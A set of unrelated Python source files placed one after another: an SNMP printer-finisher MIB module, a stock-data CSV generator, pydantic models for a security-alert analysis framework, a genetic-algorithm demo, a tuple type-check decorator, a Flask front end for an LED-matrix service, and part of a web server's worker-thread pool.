    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,))
    namedValues = NamedValues(("other", 1), ("unknown", 2), ("stitcher", 3), ("folder", 4), ("binder", 5), ("trimmer", 6), ("dieCutter", 7), ("puncher", 8), ("perforater", 9), ("slitter", 10), ("separationCutter", 11), ("imprinter", 12), ("wrapper", 13), ("bander", 14), ("makeEnvelope", 15), ("stacker", 16), ("sheetRotator", 17), ("inserter", 18),)
# Textual convention enumerating finisher attribute types
class FinAttributeTypeTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 30, 31, 40, 50, 80, 81, 82, 83, 100, 130, 160, 161, 162,))
    namedValues = NamedValues(("other", 1), ("deviceName", 3), ("deviceVendorName", 4), ("deviceModel", 5), ("deviceVersion", 6), ("deviceSerialNumber", 7), ("maximumSheets", 8), ("finProcessOffsetUnits", 9), ("finReferenceEdge", 10), ("finAxisOffset", 11), ("finJogEdge", 12), ("finHeadLocation", 13), ("finOperationRestrictions", 14), ("finNumberOfPositions", 15), ("namedConfiguration", 16), ("finMediaTypeRestriction", 17), ("finPrinterInputTraySupported", 18), ("finPreviousFinishingOperation", 19), ("finNextFinishingOperation", 20), ("stitchingType", 30), ("stitchingDirection", 31), ("foldingType", 40), ("bindingType", 50), ("punchHoleType", 80), ("punchHoleSizeLongDim", 81), ("punchHoleSizeShortDim", 82), ("punchPattern", 83), ("slittingType", 100), ("wrappingType", 130), ("stackOutputType", 160), ("stackOffset", 161), ("stackRotation", 162),)
# Textual convention identifying a media edge
class FinEdgeTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(3, 4, 5, 6,))
    namedValues = NamedValues(("topEdge", 3), ("bottomEdge", 4), ("leftEdge", 5), ("rightEdge", 6),)
# Textual convention enumerating stitching/stapling operations
class FinStitchingTypeTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5, 6, 7, 8, 9, 10,))
    namedValues = NamedValues(("other", 1), ("unknown", 2), ("stapleTopLeft", 4), ("stapleBottomLeft", 5), ("stapleTopRight", 6), ("stapleBottomRight", 7), ("saddleStitch", 8), ("edgeStitch", 9), ("stapleDual", 10),)
# Textual convention for the direction a stitch is applied
class FinStitchingDirTypeTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(2, 3, 4,))
    namedValues = NamedValues(("unknown", 2), ("topDown", 3), ("bottomUp", 4),)
# Textual convention for the angle of an applied stitch
class FinStitchingAngleTypeTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(2, 3, 4, 5,))
    namedValues = NamedValues(("unknown", 2), ("horizontal", 3), ("vertical", 4), ("slanted", 5),)
# Textual convention enumerating folding operations
class FinFoldingTypeTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5,))
    namedValues = NamedValues(("other", 1), ("unknown", 2), ("zFold", 3), ("halfFold", 4), ("letterFold", 5),)
# Textual convention enumerating binding mechanisms
class FinBindingTypeTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5, 6, 7, 8, 9, 10, 11,))
    namedValues = NamedValues(("other", 1), ("unknown", 2), ("tape", 4), ("plastic", 5), ("velo", 6), ("perfect", 7), ("spiral", 8), ("adhesive", 9), ("comb", 10), ("padding", 11),)
# Textual convention enumerating punched-hole shapes
class FinPunchHoleTypeTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7,))
    namedValues = NamedValues(("other", 1), ("unknown", 2), ("round", 3), ("oblong", 4), ("square", 5), ("rectangular", 6), ("star", 7),)
# Textual convention enumerating standard punch patterns
class FinPunchPatternTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,))
    namedValues = NamedValues(("other", 1), ("unknown", 2), ("twoHoleUSTop", 4), ("threeHoleUS", 5), ("twoHoleDIN", 6), ("fourHoleDIN", 7), ("twentyTwoHoleUS", 8), ("nineteenHoleUS", 9), ("twoHoleMetric", 10), ("swedish4Hole", 11), ("twoHoleUSSide", 12), ("fiveHoleUS", 13), ("sevenHoleUS", 14), ("mixed7H4S", 15), ("norweg6Hole", 16), ("metric26Hole", 17), ("metric30Hole", 18),)
# Textual convention enumerating slitting operations
class FinSlittingTypeTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5,))
    namedValues = NamedValues(("other", 1), ("unknown", 2), ("slitAndSeparate", 4), ("slitAndMerge", 5),)
# Textual convention enumerating wrapping operations
class FinWrappingTypeTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5,))
    namedValues = NamedValues(("other", 1), ("unknown", 2), ("shrinkWrap", 4), ("paperWrap", 5),)
# Textual convention enumerating output-stacking modes
class FinStackOutputTypeTC(Integer32, TextualConvention):
    subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5, 6,))
    namedValues = NamedValues(("other", 1), ("unknown", 2), ("straight", 4), ("offset", 5), ("crissCross", 6),)
# Register every symbol with the MIB builder so other modules can import them
mibBuilder.exportSymbols("IANA-FINISHER-MIB", FinFoldingTypeTC=FinFoldingTypeTC, FinStitchingAngleTypeTC=FinStitchingAngleTypeTC, FinPunchPatternTC=FinPunchPatternTC, FinAttributeTypeTC=FinAttributeTypeTC, FinStackOutputTypeTC=FinStackOutputTypeTC, FinSlittingTypeTC=FinSlittingTypeTC, FinBindingTypeTC=FinBindingTypeTC, FinStitchingDirTypeTC=FinStitchingDirTypeTC, ianafinisherMIB=ianafinisherMIB, FinPunchHoleTypeTC=FinPunchHoleTypeTC, FinEdgeTC=FinEdgeTC, PYSNMP_MODULE_ID=ianafinisherMIB, FinWrappingTypeTC=FinWrappingTypeTC, FinDeviceTypeTC=FinDeviceTypeTC, FinStitchingTypeTC=FinStitchingTypeTC)
|
import random
from random import randint
from datetime import datetime, timedelta
# Generate one year of synthetic daily stock data: one line per food item per
# day, walking backwards from today one day at a time.
food = ["chicken", "bread", "lettuce", "potato", "carotte", "rice", "pork", "mushroom", "tomato", "egg", "beef"]
order_date = datetime.now()
order_id = 0  # monotonically increasing order number across all lines
# with-statement guarantees the file is closed even if writing fails
# (the previous version used a bare open()/close() pair, and `id` shadowed
# the builtin of the same name)
with open('myDataStock.csv', 'w', encoding='UTF-8') as f:
    for _ in range(365):
        orderDay = str(order_date) + ","
        for item in food:
            quantity = randint(0, 300)
            line = str(order_id) + "," + orderDay + item + "," + str(quantity) + "\n"
            f.write(line)
            order_id = order_id + 1
        order_date = order_date - timedelta(days=1)
# Intended column layout. NOTE(review): ProductPrice is not actually written
# by the loop above - confirm whether it should be appended to each line.
"""
OrderNumber,OrderDate,ItemName,Quantity,ProductPrice
"""
|
# vim: sw=4:ts=4:et:cc=120
#
# data models used to communicate over HTTP
#
import datetime
import json
import uuid
from typing import Optional, Any, Union
from ace.time import utc_now
from pydantic import BaseModel, Field
from pydantic.json import pydantic_encoder
class DetectionPointModel(BaseModel):
    """Represents a detection made during analysis."""
    # required: short summary of the detection
    description: str = Field(..., description="brief one line description of what was detected")
    # optional free-form elaboration
    details: Optional[str] = Field(description="optional detailed description of the detection")
class DetectableObjectModel(BaseModel):
    """Base class for objects that can have Detection Points."""
    # defaults to an empty list (default_factory avoids a shared mutable default)
    detections: Optional[list[DetectionPointModel]] = Field(
        description="the list of detection points", default_factory=list
    )
class TaggableObjectModel(BaseModel):
    """Base class for objects that can be tagged with free-form string tags."""
    tags: Optional[list[str]] = Field(description="the list of tags added to this object", default_factory=list)
class AnalysisModuleTypeModel(BaseModel):
    """Registration record for an analysis module: what observables it
    accepts, what it depends on, and how its results are versioned and
    cached."""
    name: str = Field(description="the name of the analysis module which must be unique to another analysis modules")
    description: str = Field(description="human readable description of what the analysis module does")
    observable_types: list[str] = Field(
        default_factory=list,
        description="""List of observable types this analysis module will analyze.
    An empty list means all observable types are supported.""",
    )
    directives: list[str] = Field(
        default_factory=list,
        description="""List of required directives for this analysis module.
    An observable must have ALL of these directives added for this analysis module to accept it.
    An empty list means this analysis module has no required directives.""",
    )
    dependencies: list[str] = Field(
        default_factory=list,
        description="""The list of analysis modules this module is dependant on.
    ACE waits until all dependencies are met before submitting the analysis request to the module.
    Analysis requests will contain the results of the dependent analysis.
    An empty list means this analysis module has no dependencies.""",
    )
    tags: list[str] = Field(
        default_factory=list,
        description="""The list of all required tags for this analysis module.
    An analysis request will not created for this analysis module unless the target observable has all the tags listed.
    An empty list means this module has no required tags.""",
    )
    modes: list[str] = Field(
        default_factory=list,
        description="""The list of valid analysis modes for this module.
    The analysis_mode property of the RootAnalysis must be set to one of these values.
    An empty list means that this module runs in all analysis modes.""",
    )
    conditions: list[str] = Field(
        default_factory=list,
        description="""TODO""",
    )
    version: str = Field(
        "1.0.0",
        description="""Free form version of the module.
    This value should be updated when the analysis module is updated.""",
    )
    timeout: int = Field(
        30,
        description="""The amount of time (in seconds) the module has to
    analyze the observable until it is considered to be timed out.""",
    )
    # None disables caching entirely (see description)
    cache_ttl: Optional[int] = Field(
        description="""The amount of time (in seconds) that analysis results generated by this module are cached.
    Setting this value to None disables caching for this module."""
    )
    extended_version: dict[str, str] = Field(
        default_factory=dict,
        description="""An optional dictionary of arbitrary key/value pairs that
    can be used to add additional version data to the module. Analysis
    modules that use some kind of external data can use these fields to
    include the version of the data that was used at the time of analysis.
    For example, an analysis module that uses yara rules might want to
    include the version of the rules that was used. In the following
    example, a git remote is used as the key and the commit level of the
    repo is used as the value. This would allow an analyst to know what
    rules were used when this analysis was performed.
    { "git@some.server.com:yara_rules.git": "3d71bcef38ff86bdc44365dc4ce6cf549afbb00b" }
    The extended_version field is also used when analysis results are
    cached. The cache key are the values that are used to look up results
    in the result cache. By default ACE uses the
    - type
    - value
    - time (if available)
    - name
    - version
    All elements of this dictionary are also appended to this key. For
    example, if the analysis module uses signatures, the hash of the
    signatures could be used here which would automatically invalidate
    cache results when it changed.""",
    )
    types: list[str] = Field(default_factory=list, description="""Optional list of module catagorization types.""")
    manual: Optional[bool] = Field(
        description="""If set to True then this analysis module only execute when requested."""
    )
class AnalysisModel(DetectableObjectModel, TaggableObjectModel, BaseModel):
    """The results of an analysis performed by an analysis module on an observable."""
    # NOTE(review): the trailing "" after the description string is a no-op
    # implicit string concatenation left over from editing - harmless.
    uuid: Optional[str] = Field(
        default_factory=lambda: str(uuid.uuid4()), description="Unique identifier for this analysis." ""
    )
    type: Optional[AnalysisModuleTypeModel] = Field(description="""The analysis module that generated this result.""")
    observable_id: Optional[str] = Field(description="""The observable this analysis is for.""")
    observable_ids: Optional[list[str]] = Field(
        default_factory=list, description="""The list of observables discovered during this analysis."""
    )
    summary: Optional[str] = Field(description="""A brief human readable description of the results of the analysis.""")
    # free-form payload; must be JSON-serializable
    details: Optional[Any] = Field(
        description="""The free-form result of the analysis (must be a serializable into JSON.)"""
    )
    error_message: Optional[str] = Field(description="""The error message for when analysis has failed.""")
    stack_trace: Optional[str] = Field(description="""Optional stack trace for error messages.""")
class ObservableModel(DetectableObjectModel, TaggableObjectModel, BaseModel):
    """Something that was observed during analysis."""
    # NOTE(review): the trailing "" after the description string is a no-op
    # implicit string concatenation - harmless.
    uuid: Optional[str] = Field(
        default_factory=lambda: str(uuid.uuid4()), description="Unique identifier for this observable." ""
    )
    type: str = Field(
        ...,
        description="""The type of the observable. This can
    be a string of any value, but the value may have meaning to another
    analysis modules.""",
    )
    value: str = Field(
        ...,
        description="""Free form value of the observable.
    The precise meaning of the value depends on the type. Complex
    values should be base64 encoded.""",
    )
    time: Optional[datetime.datetime] = Field(
        description="""Optional time at which the value was observed.
    Observables without time are assumed to have occured when the root
    event occured."""
    )
    context: Optional[str] = Field(
        description="""Optional context surrounding the observation. This is
    used to communicate additional information to the analysts, such as
    where the observation was made. For example, "Source IP address of the
    sender of the email." or "From address in the email.",
    """
    )
    # map of analysis-module-type name -> analysis result for this observable
    analysis: Optional[dict[str, AnalysisModel]] = Field(
        default_factory=dict,
        description="""The record of all analysis performed on this
    observable. The keys are the names of the analysis module types.
    The values are the analyis objects for the module types.""",
    )
    directives: Optional[list[str]] = Field(
        default_factory=list, description="""The list of directives added to this observable."""
    )
    redirection: Optional[str] = Field(description="""Optional observable target for redirection.""")
    links: Optional[list[str]] = Field(
        default_factory=list,
        description="""The list of observables linked to this observable.
    Observables that are linked receive the same tags.""",
    )
    limited_analysis: Optional[list[str]] = Field(
        default_factory=list,
        description="""The list of analysis modules this observable is
    limited to. The modules in this list are the only modules that will
    analyze this observable. An empty list means there are no
    limitation.""",
    )
    excluded_analysis: Optional[list[str]] = Field(
        default_factory=list,
        description="""The list of analysis modules that are excluded by
    this observable. Modules in this list are not executed against this
    observable. An empty list means nothing is excluded.""",
    )
    requested_analysis: Optional[list[str]] = Field(
        default_factory=list,
        description="""The list of analysis modules that have been requested
    for this observable. This is the only means of executing manual
    analysis modules. An empty list means nothing is specifically
    requested.""",
    )
    relationships: Optional[dict[str, list[str]]] = Field(
        default_factory=dict,
        description="""A mapping of relationships between this observable
    and other observables. The key is the name of the relationship. The
    value for each key is a list of one or more observables related in
    this way.""",
    )
    grouping_target: Optional[bool] = Field(
        description="""An optional boolean value that indicates this
    observable should be used as the "grouping target" for all
    observables of it's type."""
    )
    request_tracking: Optional[dict[str, str]] = Field(
        default_factory=dict,
        description="""The mapping of analysis requests for this observable.
    The key is the analysis module type, the value is the analysis
    request.""",
    )
class RootAnalysisModel(AnalysisModel, BaseModel):
    """Top-level analysis object (an alert): the root of the tree of
    observables and analysis results produced for a single event."""
    tool: Optional[str] = Field(
        description="""The name of the tool that
    generated the alert (ex: splunk)."""
    )
    tool_instance: Optional[str] = Field(
        description="""The instance of the
    tool that generated the alert (ex: the hostname of the sensor)."""
    )
    alert_type: Optional[str] = Field(description="""The type of the alert (ex: splunk - ipv4 search).""")
    description: Optional[str] = Field(
        # BUG FIX: this string was previously passed positionally, making it
        # the field's *default value* instead of its documentation.
        description="""A brief one line description of the
    alert (ex: high_pdf_xor_kernel32 match in email attachment)."""
    )
    event_time: Optional[datetime.datetime] = Field(
        default_factory=utc_now,
        description="""Returns a datetime object representing the time this
    event was created or occurred.""",
    )
    name: Optional[str] = Field(
        description="""An optional property that defines a name for an alert.
    Used to track and document analyst response instructions."""
    )
    state: Optional[dict] = Field(
        default_factory=dict,
        description="""A free form dict that can store any value. Used by
    AnalysisModules to maintain state.""",
    )
    analysis_mode: Optional[str] = Field(
        description="""The current analysis mode. The mode determines what
    analysis modules are executed against the observables in this
    root."""
    )
    queue: Optional[str] = Field(
        description="""The optional name of the queue this alert should be put
    into."""
    )
    instructions: Optional[str] = Field(
        # BUG FIX: previously defaulted to a random UUID string (copy-paste
        # from the uuid fields), which is meaningless for human-readable
        # instructions; the field now defaults to None.
        description="""An optional human readable list of instructions that an
    analyst should perform when manually reviewing this alert.""",
    )
    version: Optional[str] = Field(
        description="""An optional version string that automatically changes
    every time the root is modified. The version must match when updating."""
    )
    expires: Optional[bool] = Field(
        False,
        description="""An optional boolean value if determines if this root
    will expire. If this is set to True this root analysis will
    automatically be deleted if all analysis has been completed and no
    detection points were added.""",
    )
    analysis_cancelled: Optional[bool] = Field(
        False, description="""Set this value to True to cancel any outstanding analysis requests for this root."""
    )
    analysis_cancelled_reason: Optional[str] = Field(
        description="""Optional human readable description of why analysis was canceled for this root."""
    )
    observable_store: Optional[dict[str, ObservableModel]] = Field(
        default_factory=dict,
        description="""The mapping that contains all observables for this
    entire root. The key is the uuid of the observable, the value is the
    observable. All analysis references these objects by their keys.""",
    )
class AnalysisRequestModel(BaseModel):
    """A request to analyze a single observable with a single analysis
    module type, tracking ownership, status, and before/after roots."""
    id: Optional[str] = Field(
        default_factory=lambda: str(uuid.uuid4()), description="""The unique id for this request."""
    )
    # either a reference (uuid string) to an existing root, or a full object
    root: Optional[Union[str, RootAnalysisModel]] = Field(
        description="""The root this request is for. If this is a string
    then it is a reference to an existing analysis. Otherwise it is a
    full root object."""
    )
    observable: Optional[ObservableModel] = Field(description="""The observable this request is for.""")
    type: Optional[AnalysisModuleTypeModel] = Field(description="""The analysis module type this request is for.""")
    cache_hit: Optional[bool] = Field(
        False, description="""If this is True then this request is the result of a cache hit."""
    )
    status: Optional[str] = Field(description="""The current status of this analysis request.""")
    owner: Optional[str] = Field(description="""The current owner of this analysis request.""")
    original_root: Optional[RootAnalysisModel] = Field(
        description="""The root as it existed before analysis started."""
    )
    modified_root: Optional[RootAnalysisModel] = Field(
        description="""The root as it existed after analyisis completed."""
    )
class ContentMetadata(BaseModel):
    """Metadata about a piece of stored content (e.g. a file) referenced by
    one or more root analyses."""
    name: str = Field(description="""Name of the content which can be anything such as the name of the file.""")
    sha256: Optional[str] = Field(description="""SHA2 (lowercase hex) of the content.""")
    size: Optional[int] = Field(description="""Size of the content in bytes.""")
    insert_date: Optional[datetime.datetime] = Field(
        default_factory=utc_now,
        description="""When the content was created. Defaults to now.""",
    )
    roots: Optional[list[str]] = Field(
        default_factory=list,
        description="""List of RootAnalysis UUIDs that reference this content.""",
    )
    location: Optional[str] = Field(description="""Free-form location of the content. Can be None if not used.""")
    expiration_date: Optional[datetime.datetime] = Field(
        description="""When the content should be discarded. Defaults to None which means never discarded.""",
    )
    custom: Optional[str] = Field(
        description="""Optional str for storing any other required custom properties of the content.""",
    )
class Event(BaseModel):
    """An event emitted on the system event bus, identified by name."""
    name: str = Field(description="""Unique name of the event.""")
    args: Optional[Any] = Field(description="""Optional arguments included with the event.""")
class ConfigurationSetting(BaseModel):
    """A single named configuration value with optional documentation."""
    name: str = Field(description="""Unique name of the configuration setting.""")
    value: Any = Field(description="""Value of the configuration setting.""")
    documentation: Optional[str] = Field(description="""Documentation that explains the configuration setting.""")
class AnalysisRequestQueryModel(BaseModel):
    """Parameters an analysis module worker supplies when polling for the
    next available analysis request."""
    owner: str = Field(
        description="""A unique name that identifies what is making the request. This value is tied to the analysis request for the purposes of tracking."""
    )
    amt: str = Field(description="The analysis module type this request is for.")
    timeout: int = Field(
        description="The amount of time (in seconds) to wait for a request to become available. If no requests become available during this time then an empty response is returned."
    )
    version: str = Field(
        description="The current version of the analysis module type. This value must match what is registered."
    )
    extended_version: Optional[dict[str, str]] = Field(
        # BUG FIX: the default was previously the list [] - the wrong type for
        # a dict field and a shared mutable default; use default_factory=dict.
        default_factory=dict,
        description="The optional extended version of the analysis module type. This value must match was is registered if it is used.",
    )
class AlertListModel(BaseModel):
    """A list of alerts, referenced by the UUIDs of their root analyses."""
    root_uuids: list[str]
class ErrorModel(BaseModel):
    """A machine-readable error code with human-readable details."""
    code: str
    details: str
class ApiKeyModel(BaseModel):
    """A single API key and its associated metadata."""
    api_key: str
    name: str
    description: Optional[str]
    # BUG FIX: the documentation string was previously passed as Field's first
    # positional argument, making it the field's *default value* (a truthy
    # string) rather than its description. Default to False (least privilege).
    is_admin: bool = Field(False, description="True if the key is an administrative level key.")
class ApiKeyListModel(BaseModel):
    """A collection of API keys."""
    api_keys: list[ApiKeyModel]
def custom_json_encoder(obj):
    """Serialize *obj* for JSON output.

    Objects exposing a ``to_dict`` method are serialized via that method;
    everything else is delegated to pydantic's encoder.
    """
    if hasattr(obj, "to_dict"):
        return obj.to_dict()
    return pydantic_encoder(obj)
class CustomJSONEncoder(json.JSONEncoder):
    """json.JSONEncoder for ACE model objects."""
    def default(self, obj):
        # Route through custom_json_encoder (defined above) so objects that
        # expose to_dict() serialize consistently; previously this called
        # pydantic_encoder directly, silently skipping the to_dict support.
        return custom_json_encoder(obj)
|
from PyGARV import *
"""
This class implements a Genetic Algorithm to maximize the following
function.
max f = 20x + 60y
subject to:
30x + 20y >= 2700
5x + 10y <= 850
x + y >= 95
x, y >= 0
"""
class Example(PyGARV):
    """GA that maximizes f = 20x + 60y subject to the linear constraints
    listed in the docstring above."""

    def __init__(self):
        # You can find out what each parameter does by
        # looking at the source code of the PyGARV class.
        super().__init__( popSize = 60,
                          values = 2,
                          mutationRate = 0.1, #10%
                          fullMutation = True,
                          symmetricCut = True,
                          crossoverRate = 1,
                          elitism = 0.3, #30%
                          digits = 6 )

    def fitness(self, chromosome):
        # gets the first integer value stored on the chromosome and divides
        # it by 100 to change the value to a float with two decimal places.
        x = chromosome[0]/100
        # gets the second integer value stored on the chromosome and divides
        # it by 100 to change the value to a float with two decimal places.
        y = chromosome[1]/100
        # computes the function to be maximized.
        f = 20*x + 60*y
        if(
            30*x + 20*y >= 2700 and
            5*x + 10*y <= 850 and
            x + y >= 95 and
            x > 0 and
            y > 0
        ):
            # the f value is used as the rating for the chromosome: the bigger
            # the value, the better this specific chromosome is rated.
            # IMPORTANT NOTE: the rating value can never be zero.
            rating = f
        else:
            # chromosomes that break the restrictions are not permitted,
            # so if any restriction is violated the chromosome is severely penalized.
            rating = 1/(f+1) # IMPORTANT NOTE: the rating value can never be zero.
        # the fitness function must always return the
        # chromosome being assessed and its rating value
        return [chromosome, rating]

    def finishedGA(self, bestChromosome):
        # gets the first integer value stored on the best chromosome
        # created by the Genetic Algorithm after all generations.
        x = bestChromosome[0]/100
        # gets the second integer value stored on the best chromosome
        # created by the Genetic Algorithm after all generations.
        y = bestChromosome[1]/100
        print("x: %f y: %f max(f): %f" % (x, y, (20*x + 60*y)))
if __name__ == "__main__":
    # Run the example only when executed as a script, so importing this
    # module does not kick off a 1000-generation GA as a side effect.
    garv = Example()
    garv.runGA(1000)  # runs the Genetic Algorithm for 1000 generations
|
#!/usr/bin/env python
# created by Bruce Yuan on 17-11-27
from inspect import signature
from pylimit.limit_error import LimitError
from pylimit.list_limit import check_type
from pylimit.type_limit import type_limit
import functools
def tuple_limit(**info):
    """
    Decorator restricting tuple-typed arguments item by item.

    This works like list_limit, but because a tuple is fixed in size and
    usually passed with a fixed shape, only one kind of restriction is
    provided: each item of the passed tuple must match the corresponding
    entry in the declared spec.

    Example: to require that ``a`` is a 3-tuple of (str, int, dict)::

        @tuple_limit(a=[str, int, dict])
        def test(a):
            pass

    For other restrictions (e.g. list_limit's ``a = (int, 3)`` meaning
    "three ints"), use the library's custom-check mechanism instead.

    :param info: mapping of parameter name -> sequence of expected types.
    :return: the decorating function.
    """
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            sig = signature(func)
            bound_arguments = sig.bind(*args, **kwargs)
            for name, value in bound_arguments.arguments.items():
                input_type = info.get(name)
                if input_type is None:
                    # BUG FIX: parameters without a declared spec used to hit
                    # len(None) and raise TypeError; skip them instead.
                    continue
                length = len(input_type)
                if len(value) != length:
                    raise LimitError(
                        "the set type length is {}, but the input parameter length is {}".format(
                            length,
                            len(value)
                        )
                    )
                # check each item against its declared type
                for i in range(length):
                    check_type(value[i], input_type[i])
            return func(*args, **kwargs)
        return wrapper
    return decorator
def main():
    # Demo: `a` must be a 3-tuple shaped (int, str, dict).
    @tuple_limit(a=[int, str, dict])
    @type_limit
    def test(a: tuple):
        print(a)
    test((1, "string", {}))


if __name__ == '__main__':
    main()
|
# app.py
# Flask front end for an RGB matrix (spotipi): edits an ini config file and
# starts/stops/restarts the systemd service over D-Bus.
# also importing the request module
from flask import Flask, render_template, request
import sys,os
import configparser
import dbus

app = Flask(__name__)
app.config["CACHE_TYPE"] = "null"  # disable response caching

# Path of the matrix configuration file, relative to this module.
dir = os.path.dirname(__file__)  # NOTE(review): shadows the builtin `dir`
filename = os.path.join(dir, '../../config/rgb_options.ini')

# Configuration for the matrix
config = configparser.ConfigParser()
config.read(filename)

# Handle to systemd's manager interface, used to control spotipi.service.
sysbus = dbus.SystemBus()
systemd1 = sysbus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
manager = dbus.Interface(systemd1, 'org.freedesktop.systemd1.Manager')
# home route
@app.route("/")
def saved_config():
    """Render the index page populated from the saved configuration."""
    defaults = config['DEFAULT']
    return render_template(
        'index.html',
        brightness=int(defaults['brightness']),
        width=int(defaults['rows']),
        height=int(defaults['columns']),
        power=defaults['power'],
    )
# handling power status
@app.route("/power", methods=["GET", "POST"])
def handle_power():
    """Start or stop the spotipi service and persist the new power state."""
    power = request.form['power']
    brightness = int(config['DEFAULT']['brightness'])
    width = int(config['DEFAULT']['rows'])
    height = int(config['DEFAULT']['columns'])
    config.set('DEFAULT', 'power', power)
    # BUG FIX: the brightness/size handlers write the config back to disk,
    # but the power state was only changed in memory and lost on restart.
    with open(filename, 'w') as configfile:
        config.write(configfile)
    if power == 'on':
        job = manager.StartUnit('spotipi.service', 'replace')
    else:
        job = manager.StopUnit('spotipi.service', 'replace')
    return render_template('index.html', brightness = brightness, width = width, height = height, power = power)
# handling form data
@app.route('/brightness', methods=['POST'])
def handle_brightness():
    """Persist a new brightness value and restart the service to apply it."""
    new_brightness = request.form['brightness']
    config.set('DEFAULT', 'brightness', new_brightness)
    width = int(config['DEFAULT']['rows'])
    height = int(config['DEFAULT']['columns'])
    power = config['DEFAULT']['power']
    with open(filename, 'w') as configfile:
        config.write(configfile)
    job = manager.RestartUnit('spotipi.service', 'fail')
    return render_template(
        'index.html',
        brightness=new_brightness,
        width=width,
        height=height,
        power=power,
    )
# handling form data
@app.route('/size', methods=['POST'])
def handle_size():
    # Persist new matrix dimensions and restart the service to apply them.
    config.set('DEFAULT', 'rows', request.form['width'])
    config.set('DEFAULT', 'columns', request.form['height'])
    brightness = int(config['DEFAULT']['brightness'])
    power = config['DEFAULT']['power']
    # write the updated dimensions back to the ini file
    with open(filename, 'w') as configfile:
        config.write(configfile)
    job = manager.RestartUnit('spotipi.service', 'fail')  # apply new size
    return render_template('index.html', brightness = brightness, width = int(request.form['width']), height = int(request.form['height']), power = power)
app.run(host='0.0.0.0', port=80)
|
"""A thread-based worker pool."""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import collections
import threading
import time
import socket
import warnings
from six.moves import queue
from jaraco.functools import pass_none
__all__ = ('WorkerThread', 'ThreadPool')
class TrueyZero:
    """Object which equals and does math like the integer 0 but evals True."""

    def __add__(self, other):
        # Additive identity: adding this object leaves the operand unchanged.
        return other

    # Right-hand addition behaves exactly the same way.
    __radd__ = __add__
# Shared singleton used by the worker stats lambdas: contributes nothing to a
# sum but is truthy, so `and`/`or` chains can use it as a live placeholder.
trueyzero = TrueyZero()

# Sentinel placed on the request queue to tell a worker thread to exit.
_SHUTDOWNREQUEST = None
class WorkerThread(threading.Thread):
    """Thread which continuously polls a Queue for Connection objects.

    Due to the timing issues of polling a Queue, a WorkerThread does not
    check its own 'ready' flag after it has started. To stop the thread,
    it is necessary to stick a _SHUTDOWNREQUEST object onto the Queue
    (one for each running WorkerThread).
    """

    conn = None
    """The current connection pulled off the Queue, or None."""

    server = None
    """The HTTP Server which spawned this thread, and which owns the
    Queue and is placing active connections into it."""

    ready = False
    """A simple flag for the calling server to know when this thread
    has begun polling the Queue."""

    def __init__(self, server):
        """Initialize WorkerThread instance.

        Args:
            server (cheroot.server.HTTPServer): web server object
                receiving this request
        """
        self.ready = False
        self.server = server

        # Lifetime totals; each finished connection's counters are folded
        # into these in run().
        self.requests_seen = 0
        self.bytes_read = 0
        self.bytes_written = 0
        self.start_time = None
        self.work_time = 0
        # Each stat is "lifetime total + in-flight contribution". While the
        # thread is idle (start_time is None) the `and` short-circuits to
        # `trueyzero`, which adds nothing to the sum but stays truthy, so the
        # `or` branch (which dereferences self.conn) is never evaluated.
        self.stats = {
            'Requests': lambda s: self.requests_seen + (
                self.start_time is None
                and trueyzero
                or self.conn.requests_seen
            ),
            'Bytes Read': lambda s: self.bytes_read + (
                self.start_time is None
                and trueyzero
                or self.conn.rfile.bytes_read
            ),
            'Bytes Written': lambda s: self.bytes_written + (
                self.start_time is None
                and trueyzero
                or self.conn.wfile.bytes_written
            ),
            'Work Time': lambda s: self.work_time + (
                self.start_time is None
                and trueyzero
                or time.time() - self.start_time
            ),
            'Read Throughput': lambda s: s['Bytes Read'](s) / (
                s['Work Time'](s) or 1e-6
            ),
            'Write Throughput': lambda s: s['Bytes Written'](s) / (
                s['Work Time'](s) or 1e-6
            ),
        }
        threading.Thread.__init__(self)

    def run(self):
        """Process incoming HTTP connections.

        Retrieves incoming connections from thread pool.
        """
        self.server.stats['Worker Threads'][self.getName()] = self.stats
        try:
            self.ready = True
            while True:
                conn = self.server.requests.get()
                # The shutdown sentinel ends this worker's loop.
                if conn is _SHUTDOWNREQUEST:
                    return

                self.conn = conn
                is_stats_enabled = self.server.stats['Enabled']
                if is_stats_enabled:
                    self.start_time = time.time()
                keep_conn_open = False
                try:
                    keep_conn_open = conn.communicate()
                finally:
                    # Re-queue keep-alive connections; close everything else.
                    if keep_conn_open:
                        self.server.connections.put(conn)
                    else:
                        conn.close()
                    if is_stats_enabled:
                        # Fold the finished connection's counters into the
                        # lifetime totals before going idle again.
                        self.requests_seen += self.conn.requests_seen
                        self.bytes_read += self.conn.rfile.bytes_read
